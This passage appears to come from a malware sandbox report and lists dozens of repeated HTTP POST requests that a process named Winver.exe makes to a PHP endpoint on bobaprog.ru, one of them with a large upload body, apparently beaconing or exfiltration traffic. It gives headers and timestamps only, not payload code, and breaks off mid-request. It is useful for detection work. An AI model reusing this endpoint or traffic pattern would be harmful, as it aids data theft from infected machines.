        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:39 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 136920
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:40 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 4
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:40 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:42 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:43 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:44 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:45 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:46 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:47 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:49 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:50 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:51 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:52 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:53 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:54 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:56 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:57 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:58 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:59 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:00 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:01 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:03 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:04 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:05 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:06 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:07 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:08 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:10 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:11 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:12 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:13 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:14 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:16 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:17 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:18 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:19 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:20 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:21 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:23 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:24 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:25 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:26 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:27 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:28 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
